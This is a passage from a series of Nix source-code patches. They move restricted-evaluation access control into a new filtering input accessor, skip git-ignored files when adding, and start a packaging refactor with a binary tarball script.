state.checkSourcePath(state.coerceToPath(pos, *args[0], context, "while evaluating the first argument passed to 'builtins.storePath'")).path; + auto path = state.coerceToPath(pos, *args[0], context, "while evaluating the first argument passed to 'builtins.storePath'").path; /* Resolve symlinks in ‘path’, unless ‘path’ itself is a symlink directly in the store. The latter condition is necessary so e.g. nix-push does the right thing. */ @@ -1535,12 +1528,7 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, { auto & arg = *args[0]; - /* We don’t check the path right now, because we don’t want to - throw if the path isn’t allowed, but just return false (and we - can’t just catch the exception here because we still want to - throw if something in the evaluation of `arg` tries to - access an unauthorized path). */ - auto path = realisePath(state, pos, arg, { .checkForPureEval = false }); + auto path = realisePath(state, pos, arg); /* SourcePath doesn't know about trailing slash. */ auto mustBeDir = arg.type() == nString @@ -1548,14 +1536,9 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, || arg.string_view().ends_with("/.")); try { - auto checked = state.checkSourcePath(path); - auto st = checked.maybeLstat(); + auto st = path.maybeLstat(); auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory); v.mkBool(exists); - } catch (SysError & e) { - /* Don't give away info from errors while canonicalising - ‘path’ in restricted mode. */ - v.mkBool(false); } catch (RestrictedPathError & e) { v.mkBool(false); } @@ -1699,7 +1682,7 @@ static void prim_findFile(EvalState & state, const PosIdx pos, Value * * args, V auto path = state.forceStringNoCtx(*args[1], pos, "while evaluating the second argument passed to builtins.findFile"); - v.mkPath(state.checkSourcePath(state.findFile(searchPath, path, pos))); + v.mkPath(state.findFile(searchPath, path, pos)); } static RegisterPrimOp primop_findFile(PrimOp { @@ -2178,11 +2161,35 @@ static RegisterPrimOp primop_toFile({ .fun = prim_toFile, }); +bool EvalState::callPathFilter( + Value * filterFun, + const SourcePath & path, + std::string_view pathArg, + PosIdx pos) +{ + auto st = path.lstat(); + + /* Call the filter function. The first argument is the path, the + second is a string indicating the type of the file. */ + Value arg1; + arg1.mkString(pathArg); + + Value arg2; + // assert that type is not "unknown" + arg2.mkString(fileTypeToString(st.type)); + + Value * args []{&arg1, &arg2}; + Value res; + callFunction(*filterFun, 2, args, res, pos); + + return forceBool(res, pos, "while evaluating the return value of the path filter function"); +} + static void addPath( EvalState & state, const PosIdx pos, std::string_view name, - Path path, + SourcePath path, Value * filterFun, FileIngestionMethod method, const std::optional expectedHash, @@ -2190,48 +2197,29 @@ static void addPath( const NixStringContext & context) { try { - // FIXME: handle CA derivation outputs (where path needs to - // be rewritten to the actual output). - auto rewrites = state.realiseContext(context); - path = state.toRealPath(rewriteStrings(path, rewrites), context); - StorePathSet refs; - if (state.store->isInStore(path)) { + if (path.accessor == state.rootFS && state.store->isInStore(path.path.abs())) { + // FIXME: handle CA derivation outputs (where path needs to + // be rewritten to the actual output). + auto rewrites = state.realiseContext(context); + path = {state.rootFS, CanonPath(state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context))}; + try { - auto [storePath, subPath] = state.store->toStorePath(path); + auto [storePath, subPath] = state.store->toStorePath(path.path.abs()); // FIXME: we should scanForReferences on the path before adding it refs = state.store->queryPathInfo(storePath)->references; - path = state.store->toRealPath(storePath) + subPath; + path = {state.rootFS, CanonPath(state.store->toRealPath(storePath) + subPath)}; } catch (Error &) { // FIXME: should be InvalidPathError } } - path = evalSettings.pureEval && expectedHash - ? path - : state.checkSourcePath(state.rootPath(CanonPath(path))).path.abs(); - - PathFilter filter = filterFun ? ([&](const Path & path) { - auto st = lstat(path); - - /* Call the filter function. The first argument is the path, - the second is a string indicating the type of the file. */ - Value arg1; - arg1.mkString(path); - - Value arg2; - arg2.mkString( - S_ISREG(st.st_mode) ? "regular" : - S_ISDIR(st.st_mode) ? "directory" : - S_ISLNK(st.st_mode) ? "symlink" : - "unknown" /* not supported, will fail! */); - - Value * args []{&arg1, &arg2}; - Value res; - state.callFunction(*filterFun, 2, args, res, pos); - - return state.forceBool(res, pos, "while evaluating the return value of the path filter function"); - }) : defaultPathFilter; + std::unique_ptr filter; + if (filterFun) + filter = std::make_unique([&](const Path & p) { + auto p2 = CanonPath(p); + return state.callPathFilter(filterFun, {path.accessor, p2}, p2.abs(), pos); + }); std::optional expectedStorePath; if (expectedHash) @@ -2242,7 +2230,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = state.rootPath(CanonPath(path)).fetchToStore(state.store, name, method, &filter, state.repair); + auto dstPath = path.fetchToStore(state.store, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); @@ -2261,7 +2249,8 @@ static void prim_filterSource(EvalState & state, const PosIdx pos, Value * * arg auto path = state.coerceToPath(pos, *args[1], context, "while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'"); state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.filterSource"); - addPath(state, pos, path.baseName(), path.path.abs(), args[0], FileIngestionMethod::Recursive, std::nullopt, v, context); + + addPath(state, pos, path.baseName(), path, args[0], FileIngestionMethod::Recursive, std::nullopt, v, context); } static RegisterPrimOp primop_filterSource({ @@ -2356,7 +2345,7 @@ static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value if (name.empty()) name = path->baseName(); - addPath(state, pos, name, path->path.abs(), filterFun, method, expectedHash, v, context); + addPath(state, pos, name, *path, filterFun, method, expectedHash, v, context); } static RegisterPrimOp primop_path({ diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 75ce12a8c..e2986bfe0 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -310,8 +310,11 @@ static void main_nix_build(int argc, char * * argv) else /* If we're in a #! script, interpret filenames relative to the script. */ - exprs.push_back(state->parseExprFromFile(resolveExprPath(state->checkSourcePath(lookupFileArg(*state, - inShebang && !packages ? absPath(i, absPath(dirOf(script))) : i))))); + exprs.push_back( + state->parseExprFromFile( + resolveExprPath( + lookupFileArg(*state, + inShebang && !packages ? absPath(i, absPath(dirOf(script))) : i)))); } } diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index c67409e89..86b9be17d 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -183,7 +183,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { Expr * e = fromArgs ? state->parseExprFromString(i, state->rootPath(CanonPath::fromCwd())) - : state->parseExprFromFile(resolveExprPath(state->checkSourcePath(lookupFileArg(*state, i)))); + : state->parseExprFromFile(resolveExprPath(lookupFileArg(*state, i))); processExpr(*state, attrPaths, parseOnly, strict, autoArgs, evalOnly, outputKind, xmlOutputSourceLocation, e); } diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index 197ae7a10..b8deceacc 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -14,8 +14,8 @@ nix-instantiate --restrict-eval --eval -E 'builtins.readFile ./simple.nix' -I sr (! nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel') nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel' -I src=../../src -(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in ') -nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in ' -I src=. +(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ') +nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' -I src=. p=$(nix eval --raw --expr "builtins.fetchurl file://$(pwd)/restricted.sh" --impure --restrict-eval --allowed-uris "file://$(pwd)") cmp $p restricted.sh From 305939655a6cd680997981ca6077d4ce7f957984 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:28:33 +0100 Subject: [PATCH 012/654] Remove superfluous use of hasAccessControl() --- src/libexpr/primops.cc | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 0f7706563..c442de986 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -91,9 +91,8 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & [outputName, outputPath] : outputs) { /* Add the output of this derivations to the allowed paths. */ - if (rootFS->hasAccessControl()) { - allowPath(store->toRealPath(outputPath)); - } + allowPath(store->toRealPath(outputPath)); + /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { res.insert_or_assign( From 43d9fb6cf180c421be17b4247f5dd032cf4843f5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:44:54 +0100 Subject: [PATCH 013/654] Remove InputAccessor::root() --- src/libexpr/value.hh | 7 +++---- src/libfetchers/fetchers.cc | 2 +- src/libfetchers/input-accessor.cc | 7 +------ src/libfetchers/input-accessor.hh | 7 +++++-- 4 files changed, 10 insertions(+), 13 deletions(-) diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index bcff8ae55..72a3a2b32 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -424,10 +424,9 @@ public: SourcePath path() const { assert(internalType == tPath); - return SourcePath { - .accessor = ref(_path.accessor->shared_from_this()), - .path = CanonPath(CanonPath::unchecked_t(), _path.path) - }; + return SourcePath( + ref(_path.accessor->shared_from_this()), + CanonPath(CanonPath::unchecked_t(), _path.path)); } std::string_view string_view() const diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 60208619e..5fd9e069f 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -374,7 +374,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = accessor->root().fetchToStore(store, input2.getName()); + auto storePath = SourcePath(accessor).fetchToStore(store, input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 85dc4609f..f54a5a6fd 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -53,11 +53,6 @@ StorePath InputAccessor::fetchToStore( return storePath; } -SourcePath InputAccessor::root() -{ - return {ref(shared_from_this()), CanonPath::root}; -} - std::ostream & operator << (std::ostream & str, const SourcePath & path) { str << path.to_string(); @@ -88,7 +83,7 @@ SourcePath SourcePath::parent() const SourcePath SourcePath::resolveSymlinks() const { - auto res = accessor->root(); + auto res = SourcePath(accessor); int linksAllowed = 1024; diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index 26d17f064..d5ac238b1 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -36,8 +36,6 @@ struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this accessor; CanonPath path; + SourcePath(ref accessor, CanonPath path = CanonPath::root) + : accessor(std::move(accessor)) + , path(std::move(path)) + { } + std::string_view baseName() const; /** From be30c2ea8de7f12d610b695bd7c6edf22b32fe55 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 8 Nov 2023 17:52:22 -0800 Subject: [PATCH 014/654] Don't attempt to `git add` ignored files This uses `git check-ignore` to determine if files are ignored before attempting to add them in `putFile`. We also add a condition to the `fetchFromWorkdir` filter to always add the `flake.lock` file, even if it's not tracked. This is necessary to resolve inputs. This fixes #8854 without `git add --force`. --- src/libfetchers/git.cc | 25 ++++++++++++++++++------- 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..734c29258 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -313,15 +313,26 @@ struct GitInputScheme : InputScheme writeFile((CanonPath(repoInfo.url) + path).abs(), contents); - runProgram("git", true, - { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "add", "--intent-to-add", "--", std::string(path.rel()) }); + auto result = runProgram(RunOptions { + .program = "git", + .args = {"-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "check-ignore", "--quiet", std::string(path.rel())}, + }); + auto exitCode = WEXITSTATUS(result.first); - // Pause the logger to allow for user input (such as a gpg passphrase) in `git commit` - logger->pause(); - Finally restoreLogger([]() { logger->resume(); }); - if (commitMsg) + if (exitCode != 0) { + // The path is not `.gitignore`d, we can add the file. runProgram("git", true, - { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "commit", std::string(path.rel()), "-m", *commitMsg }); + { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "add", "--intent-to-add", "--", std::string(path.rel()) }); + + + if (commitMsg) { + // Pause the logger to allow for user input (such as a gpg passphrase) in `git commit` + logger->pause(); + Finally restoreLogger([]() { logger->resume(); }); + runProgram("git", true, + { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "commit", std::string(path.rel()), "-m", *commitMsg }); + } + } } struct RepoInfo From 8cafc754d845529a78595d1196769257ee23ca56 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 21:54:53 +0100 Subject: [PATCH 015/654] Move access control from FSInputAccessor to FilteringInputAccessor --- src/libexpr/eval.cc | 23 +++--- src/libexpr/eval.hh | 3 +- src/libfetchers/filtering-input-accessor.cc | 83 +++++++++++++++++++++ src/libfetchers/filtering-input-accessor.hh | 73 ++++++++++++++++++ src/libfetchers/fs-input-accessor.cc | 77 +++---------------- src/libfetchers/fs-input-accessor.hh | 22 +----- src/libfetchers/git.cc | 6 +- 7 files changed, 191 insertions(+), 96 deletions(-) create mode 100644 src/libfetchers/filtering-input-accessor.cc create mode 100644 src/libfetchers/filtering-input-accessor.hh diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 23ac349fe..841c223cd 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -14,6 +14,7 @@ #include "profiles.hh" #include "print.hh" #include "fs-input-accessor.hh" +#include "filtering-input-accessor.hh" #include "memory-input-accessor.hh" #include "signals.hh" #include "gc-small-vector.hh" @@ -510,17 +511,15 @@ EvalState::EvalState( , repair(NoRepair) , emptyBindings(0) , rootFS( - makeFSInputAccessor( - CanonPath::root, - evalSettings.restrictEval || evalSettings.pureEval - ? std::optional>(std::set()) - : std::nullopt, + evalSettings.restrictEval || evalSettings.pureEval + ? ref(AllowListInputAccessor::create(makeFSInputAccessor(CanonPath::root), {}, [](const CanonPath & path) -> RestrictedPathError { auto modeInformation = evalSettings.pureEval ? "in pure evaluation mode (use '--impure' to override)" : "in restricted mode"; throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); })) + : makeFSInputAccessor(CanonPath::root)) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -563,7 +562,7 @@ EvalState::EvalState( } /* Allow access to all paths in the search path. */ - if (rootFS->hasAccessControl()) + if (rootFS.dynamic_pointer_cast()) for (auto & i : searchPath.elements) resolveSearchPathPath(i.path, true); @@ -583,12 +582,14 @@ EvalState::~EvalState() void EvalState::allowPath(const Path & path) { - rootFS->allowPath(CanonPath(path)); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->allowPath(CanonPath(path)); } void EvalState::allowPath(const StorePath & storePath) { - rootFS->allowPath(CanonPath(store->toRealPath(storePath))); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->allowPath(CanonPath(store->toRealPath(storePath))); } void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v) @@ -617,12 +618,14 @@ void EvalState::checkURI(const std::string & uri) /* If the URI is a path, then check it against allowedPaths as well. */ if (hasPrefix(uri, "/")) { - rootFS->checkAllowed(CanonPath(uri)); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->checkAccess(CanonPath(uri)); return; } if (hasPrefix(uri, "file://")) { - rootFS->checkAllowed(CanonPath(uri.substr(7))); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->checkAccess(CanonPath(uri.substr(7))); return; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index ee7bdda0d..f3f6d35b9 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -30,7 +30,6 @@ class EvalState; class StorePath; struct SingleDerivedPath; enum RepairFlag : bool; -struct FSInputAccessor; struct MemoryInputAccessor; @@ -222,7 +221,7 @@ public: /** * The accessor for the root filesystem. */ - const ref rootFS; + const ref rootFS; /** * The in-memory filesystem for paths. diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc new file mode 100644 index 000000000..5ae416fd3 --- /dev/null +++ b/src/libfetchers/filtering-input-accessor.cc @@ -0,0 +1,83 @@ +#include "filtering-input-accessor.hh" + +namespace nix { + +std::string FilteringInputAccessor::readFile(const CanonPath & path) +{ + checkAccess(path); + return next->readFile(prefix + path); +} + +bool FilteringInputAccessor::pathExists(const CanonPath & path) +{ + return isAllowed(path) && next->pathExists(prefix + path); +} + +std::optional FilteringInputAccessor::maybeLstat(const CanonPath & path) +{ + checkAccess(path); + return next->maybeLstat(prefix + path); +} + +InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath & path) +{ + checkAccess(path); + DirEntries entries; + for (auto & entry : next->readDirectory(prefix + path)) { + if (isAllowed(path + entry.first)) + entries.insert(std::move(entry)); + } + return entries; +} + +std::string FilteringInputAccessor::readLink(const CanonPath & path) +{ + checkAccess(path); + return next->readLink(prefix + path); +} + +std::string FilteringInputAccessor::showPath(const CanonPath & path) +{ + return next->showPath(prefix + path); +} + +void FilteringInputAccessor::checkAccess(const CanonPath & path) +{ + if (!isAllowed(path)) + throw makeNotAllowedError + ? makeNotAllowedError(path) + : RestrictedPathError("access to path '%s' is forbidden", showPath(path)); +} + +struct AllowListInputAccessorImpl : AllowListInputAccessor +{ + std::set allowedPaths; + + AllowListInputAccessorImpl( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError) + : AllowListInputAccessor(SourcePath(next), std::move(makeNotAllowedError)) + , allowedPaths(std::move(allowedPaths)) + { } + + bool isAllowed(const CanonPath & path) override + { + return path.isAllowed(allowedPaths); + } + + void allowPath(CanonPath path) override + { + allowedPaths.insert(std::move(path)); + } +}; + +ref AllowListInputAccessor::create( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError) +{ + return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError)); +} + +} diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh new file mode 100644 index 000000000..209d26974 --- /dev/null +++ b/src/libfetchers/filtering-input-accessor.hh @@ -0,0 +1,73 @@ +#pragma once + +#include "input-accessor.hh" + +namespace nix { + +/** + * A function that should throw an exception of type + * `RestrictedPathError` explaining that access to `path` is + * forbidden. + */ +typedef std::function MakeNotAllowedError; + +/** + * An abstract wrapping `InputAccessor` that performs access + * control. Subclasses should override `checkAccess()` to implement an + * access control policy. + */ +struct FilteringInputAccessor : InputAccessor +{ + ref next; + CanonPath prefix; + MakeNotAllowedError makeNotAllowedError; + + FilteringInputAccessor(const SourcePath & src, MakeNotAllowedError && makeNotAllowedError) + : next(src.accessor) + , prefix(src.path) + , makeNotAllowedError(std::move(makeNotAllowedError)) + { } + + std::string readFile(const CanonPath & path) override; + + bool pathExists(const CanonPath & path) override; + + std::optional maybeLstat(const CanonPath & path) override; + + DirEntries readDirectory(const CanonPath & path) override; + + std::string readLink(const CanonPath & path) override; + + std::string showPath(const CanonPath & path) override; + + /** + * Call `makeNotAllowedError` to throw a `RestrictedPathError` + * exception if `isAllowed()` returns `false` for `path`. + */ + void checkAccess(const CanonPath & path); + + /** + * Return `true` iff access to path is allowed. + */ + virtual bool isAllowed(const CanonPath & path) = 0; +}; + +/** + * A wrapping `InputAccessor` that checks paths against an allow-list. + */ +struct AllowListInputAccessor : public FilteringInputAccessor +{ + /** + * Grant access to the specified path. + */ + virtual void allowPath(CanonPath path) = 0; + + static ref create( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError); + + using FilteringInputAccessor::FilteringInputAccessor; +}; + +} diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index 2efee932d..c3d8d273c 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -4,19 +4,12 @@ namespace nix { -struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor +struct FSInputAccessor : InputAccessor, PosixSourceAccessor { CanonPath root; - std::optional> allowedPaths; - MakeNotAllowedError makeNotAllowedError; - FSInputAccessorImpl( - const CanonPath & root, - std::optional> && allowedPaths, - MakeNotAllowedError && makeNotAllowedError) + FSInputAccessor(const CanonPath & root) : root(root) - , allowedPaths(std::move(allowedPaths)) - , makeNotAllowedError(std::move(makeNotAllowedError)) { displayPrefix = root.isRoot() ? "" : root.abs(); } @@ -27,39 +20,30 @@ struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor std::function sizeCallback) override { auto absPath = makeAbsPath(path); - checkAllowed(absPath); PosixSourceAccessor::readFile(absPath, sink, sizeCallback); } bool pathExists(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - return isAllowed(absPath) && PosixSourceAccessor::pathExists(absPath); + return PosixSourceAccessor::pathExists(makeAbsPath(path)); } std::optional maybeLstat(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); - return PosixSourceAccessor::maybeLstat(absPath); + return PosixSourceAccessor::maybeLstat(makeAbsPath(path)); } DirEntries readDirectory(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); DirEntries res; - for (auto & entry : PosixSourceAccessor::readDirectory(absPath)) - if (isAllowed(absPath + entry.first)) - res.emplace(entry); + for (auto & entry : PosixSourceAccessor::readDirectory(makeAbsPath(path))) + res.emplace(entry); return res; } std::string readLink(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); - return PosixSourceAccessor::readLink(absPath); + return PosixSourceAccessor::readLink(makeAbsPath(path)); } CanonPath makeAbsPath(const CanonPath & path) @@ -67,59 +51,22 @@ struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor return root + path; } - void checkAllowed(const CanonPath & absPath) override - { - if (!isAllowed(absPath)) - throw makeNotAllowedError - ? makeNotAllowedError(absPath) - : RestrictedPathError("access to path '%s' is forbidden", absPath); - } - - bool isAllowed(const CanonPath & absPath) - { - if (!absPath.isWithin(root)) - return false; - - if (allowedPaths) { - auto p = absPath.removePrefix(root); - if (!p.isAllowed(*allowedPaths)) - return false; - } - - return true; - } - - void allowPath(CanonPath path) override - { - if (allowedPaths) - allowedPaths->insert(std::move(path)); - } - - bool hasAccessControl() override - { - return (bool) allowedPaths; - } - std::optional getPhysicalPath(const CanonPath & path) override { return makeAbsPath(path); } }; -ref makeFSInputAccessor( - const CanonPath & root, - std::optional> && allowedPaths, - MakeNotAllowedError && makeNotAllowedError) +ref makeFSInputAccessor(const CanonPath & root) { - return make_ref(root, std::move(allowedPaths), std::move(makeNotAllowedError)); + return make_ref(root); } -ref makeStorePathAccessor( +ref makeStorePathAccessor( ref store, - const StorePath & storePath, - MakeNotAllowedError && makeNotAllowedError) + const StorePath & storePath) { - return makeFSInputAccessor(CanonPath(store->toRealPath(storePath)), {}, std::move(makeNotAllowedError)); + return makeFSInputAccessor(CanonPath(store->toRealPath(storePath))); } SourcePath getUnfilteredRootPath(CanonPath path) diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index 19a5211c8..ba5af5887 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -7,26 +7,12 @@ namespace nix { class StorePath; class Store; -struct FSInputAccessor : InputAccessor -{ - virtual void checkAllowed(const CanonPath & absPath) = 0; +ref makeFSInputAccessor( + const CanonPath & root); - virtual void allowPath(CanonPath path) = 0; - - virtual bool hasAccessControl() = 0; -}; - -typedef std::function MakeNotAllowedError; - -ref makeFSInputAccessor( - const CanonPath & root, - std::optional> && allowedPaths = {}, - MakeNotAllowedError && makeNotAllowedError = {}); - -ref makeStorePathAccessor( +ref makeStorePathAccessor( ref store, - const StorePath & storePath, - MakeNotAllowedError && makeNotAllowedError = {}); + const StorePath & storePath); SourcePath getUnfilteredRootPath(CanonPath path); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..ff4b1e823 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -9,6 +9,7 @@ #include "processes.hh" #include "git.hh" #include "fs-input-accessor.hh" +#include "filtering-input-accessor.hh" #include "mounted-input-accessor.hh" #include "git-utils.hh" #include "logging.hh" @@ -639,7 +640,10 @@ struct GitInputScheme : InputScheme repoInfo.workdirInfo.files.insert(submodule.path); ref accessor = - makeFSInputAccessor(CanonPath(repoInfo.url), repoInfo.workdirInfo.files, makeNotAllowedError(repoInfo.url)); + AllowListInputAccessor::create( + makeFSInputAccessor(CanonPath(repoInfo.url)), + std::move(repoInfo.workdirInfo.files), + makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor consisting of the accessor for the top-level repo and the From c982198485a995d40b01b8caf62df5458046614d Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:48:44 +0000 Subject: [PATCH 016/654] First step --- binary-tarball.nix | 81 ++++++++++++++ flake.nix | 262 +++++++++++++-------------------------------- lowdown.nix | 22 ++++ package.nix | 239 +++++++++++++++++++++++++++++++++++++++++ 4 files changed, 415 insertions(+), 189 deletions(-) create mode 100644 binary-tarball.nix create mode 100644 lowdown.nix create mode 100644 package.nix diff --git a/binary-tarball.nix b/binary-tarball.nix new file mode 100644 index 000000000..1fa185519 --- /dev/null +++ b/binary-tarball.nix @@ -0,0 +1,81 @@ +{ runCommand +, version +, system +, nix +, cacert +}: + +let + + installerClosureInfo = buildPackages.closureInfo { + rootPaths = [ nix cacert ]; + }; + + env = { + meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; + }; + +in + +runCommand "nix-binary-tarball-${version}" env '' + cp ${installerClosureInfo}/registration $TMPDIR/reginfo + cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh + substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + + substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + + if type -p shellcheck; then + # SC1090: Don't worry about not being able to find + # $nix/etc/profile.d/nix.sh + shellcheck --exclude SC1090 $TMPDIR/install + shellcheck $TMPDIR/create-darwin-volume.sh + shellcheck $TMPDIR/install-darwin-multi-user.sh + shellcheck $TMPDIR/install-systemd-multi-user.sh + + # SC1091: Don't panic about not being able to source + # /etc/profile + # SC2002: Ignore "useless cat" "error", when loading + # .reginfo, as the cat is a much cleaner + # implementation, even though it is "useless" + # SC2116: Allow ROOT_HOME=$(echo ~root) for resolving + # root's home directory + shellcheck --external-sources \ + --exclude SC1091,SC2002,SC2116 $TMPDIR/install-multi-user + fi + + chmod +x $TMPDIR/install + chmod +x $TMPDIR/create-darwin-volume.sh + chmod +x $TMPDIR/install-darwin-multi-user.sh + chmod +x $TMPDIR/install-systemd-multi-user.sh + chmod +x $TMPDIR/install-multi-user + dir=nix-${version}-${system} + fn=$out/$dir.tar.xz + mkdir -p $out/nix-support + echo "file binary-dist $fn" >> $out/nix-support/hydra-build-products + tar cvfJ $fn \ + --owner=0 --group=0 --mode=u+rw,uga+r \ + --mtime='1970-01-01' \ + --absolute-names \ + --hard-dereference \ + --transform "s,$TMPDIR/install,$dir/install," \ + --transform "s,$TMPDIR/create-darwin-volume.sh,$dir/create-darwin-volume.sh," \ + --transform "s,$TMPDIR/reginfo,$dir/.reginfo," \ + --transform "s,$NIX_STORE,$dir/store,S" \ + $TMPDIR/install \ + $TMPDIR/create-darwin-volume.sh \ + $TMPDIR/install-darwin-multi-user.sh \ + $TMPDIR/install-systemd-multi-user.sh \ + $TMPDIR/install-multi-user \ + $TMPDIR/reginfo \ + $(cat ${installerClosureInfo}/store-paths) +'' diff --git a/flake.nix b/flake.nix index 33673575b..a1fc1cd1c 100644 --- a/flake.nix +++ b/flake.nix @@ -7,7 +7,7 @@ inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, flake-compat, libgit2 }: + outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2 }: let inherit (nixpkgs) lib; @@ -34,7 +34,14 @@ "x86_64-freebsd13" "x86_64-netbsd" ]; - stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; + stdenvs = 